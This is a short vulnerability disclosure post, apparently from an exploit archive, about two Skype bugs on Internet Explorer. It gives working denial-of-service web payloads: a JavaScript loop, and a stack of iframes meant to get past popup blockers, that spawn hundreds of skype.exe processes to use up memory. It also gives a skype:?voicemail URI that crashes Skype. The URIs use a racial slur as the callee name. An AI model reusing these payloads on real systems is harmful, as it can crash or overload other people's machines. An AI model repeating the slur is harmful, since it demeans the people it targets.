1. Skype and Internet Explorer uri handler mechanism memory resources consumption bug:
<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>
This will invoke many skype.exe processes and as they are not closed - much memory will be consumed. Such script will be blocked by popup blocker, so it is possible to do it other way:
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
.... I've used about megabyte of such crap
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
Tested on IE7, WinXP SP2 and skype 3.6.0.216
2. Unexploitable Skype null pointer dereference:
skype:?voicemail
To trigger the bug a right mouse button must be clicked, or menu button selected. Skype should crash :)
Found here: http://www.critical.lt/?opinions/show/1433
credits: Critical Security